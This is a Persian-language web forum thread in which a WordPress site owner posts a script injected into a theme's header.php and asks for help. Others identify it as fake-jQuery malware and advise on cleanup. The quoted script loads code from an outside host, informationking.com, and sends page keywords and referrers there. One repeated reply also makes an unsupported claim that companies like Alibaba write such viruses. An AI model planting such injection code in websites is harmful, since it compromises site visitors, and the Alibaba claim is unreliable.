درود دوستان این اسکریپ یا کد یا .... یعنی دهن منو سرویس کرده وسلام اقا این چیه به زبان عامیانه بگو

کشته منو

بیچارم کرده

یکی اینو تشخیص بده یه رفقا گفتم گفتند که به برنامه نویس بگو
این هر روز میاد تو فایل header.php قالبم اضافه میشه بالای هد

چه کنم از چیه ؟


<script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefined ||document.referrer!==''||document.referrer!==null ){document.write('<script type="text/javascript" src="http://informationking.com/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://informationking.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURICo mponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer )+'&source='+encodeURIComponent(window.location.host)) +'"><'+'/script>');}</script>



سایتم biography98.com

انتی ویروس به این لینک گیر میده حتما جکویری های شما قدیمی هستن باید بروز کنید و سرورتون رو اسکن کنید تا ویروس هایتون پاک شه سرورتون الوده شدهhttp://informationking.com/js/jquery.min.php?c_utt=J18171&c_utm

اسکن کردم ولی ویروس پیدا نکرد که پاک بکنه در مورد جیکوئری متوجه نشدم
کسی میتونه درستش کنه ؟
ایا با تعویض قالب مشکل حل میشه ؟

ربطی به قالب نداره مشکل از سرور شماست حتما بسته ای نصبی روی سرور قدیمی هستن که موجب ضعف سایت و نفوذ ویروس ها شده این کدی که شما گذاشتید یه اسکریپت تبلیغاتی هست که الان اکثر کمپانی های بزرگ مثل alibaba.com یا امثال اینا برای اینکه مارک خودشون رو به همه بشناسونن میان یه ویروس های مینویسن که اگه سایتی ضعف وبسرور داشت نفوذ کنن و محصول خودشون رو نشون بدن یادمه همین علی بابا یه ویروسی نوشته بود که با ست کردن دی ان اس های روی مودم های که ضعف امنیتی داشتن بنر تبلیغاتی محصولاتشون رو نشون میدادن که الانم این ضعف های تو بیشتر isp ها وجود داره دوست عزیز وبسرور شما باید بررسی بشه مایل باشید با هزینه انجام میدم موفق باشید

کدی به فایل header.php پوسته سایت شما اضافه میشه بدافزار jquery جعلی هست. اطلاعات بیشتر در مورد این بدافزار رو می تونین در آدرس زیر ببینین:

https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html

این بدافزار بعد از هک سایتهای جوملایی/وردپرسی غیر امن به پوسته این برنامه ها اینجکت میشه.

حذف تنهای کد اینجکت شده از فایلها کافی نیست و می بایست مشکل امنیتی برنامه سایت(رمز عبور ضعیف، یوزرهای بکدور ساخته شده از نفوذهای قبلی، پوسته (ها) یا افزونه (های) غیر امن نصب شده بر روی وردپرس) رو شناسایی و برای رفع اون اقدام کنید. به علاوه احتمالا فایلهای دیگه ای از سایت هم به کدهای بکدور آلوده هست و باید این کدها رو هم شناسایی و پاکسازی کنید.

معمولا چنین کدهایی پس از نفوذ مستقیم به یک سرور در سایتهای جوملایی/وردپرسی اینجکت نمیشه و هکرها به صورت مستقیم اسکرپیتهای غیر امن رو هدف حمله قرار میدن بنابراین احتمال اینکه نفوذ به سایت از طریق حفره امنیتی اسکریپت سایت صورت گرفته باشه بسیار بالاتر از نفوذ از طریق یک باگ امنیتی در سرور هست و بنابراین بررسی امنیت اسکریپت سایت اولیت بالاتری داره.



ربطی به قالب نداره مشکل از سرور شماست حتما بسته ای نصبی روی سرور قدیمی هستن که موجب ضعف سایت و نفوذ ویروس ها شده این کدی که شما گذاشتید یه اسکریپت تبلیغاتی هست که الان اکثر کمپانی های بزرگ مثل alibaba.com یا امثال اینا برای اینکه مارک خودشون رو به همه بشناسونن میان یه ویروس های مینویسن که اگه سایتی ضعف وبسرور داشت نفوذ کنن و محصول خودشون رو نشون بدن یادمه همین علی بابا یه ویروسی نوشته بود که با ست کردن دی ان اس های روی مودم های که ضعف امنیتی داشتن بنر تبلیغاتی محصولاتشون رو نشون میدادن که الانم این ضعف های تو بیشتر isp ها وجود داره دوست عزیز وبسرور شما باید بررسی بشه مایل باشید با هزینه انجام میدم موفق باشید


پیشنهاد می شه از ارایه چنین اظهار نظرهایی که بدون بررسی و جمع آوری اطلاعات کافی و ارایه دلایل فنی و مستند به عنوان عامل قطعی یک مشکل هست خودداری کنین. این چنین اظهار نظرهایی نه تنها کمکی به رفع مشکل دوستان نمیکنه که باعث سردرگمی اونها میشه و سطح فنی/تخصصی این انجمن رو پایین میاره.

من کسی رو گمراه نکردم دوست عزیز این کدها یه سری ویروس ها هستن که تو سطح نت پخ شدن حالا با اپلود فایل یا باگ های که وبسرور داره این کد های مخرب خودشون رو به بدنه قالب یا مازول های اسیب پذیر میچسبونن و این عامل باعث میشه تا تبلیغ یه سایت دیگه بطور ناگهانی تو سایت مورد نظر نشون داده بشه من چیزی میدونم میگم الکی اظهار نظر نکردم موفق باشید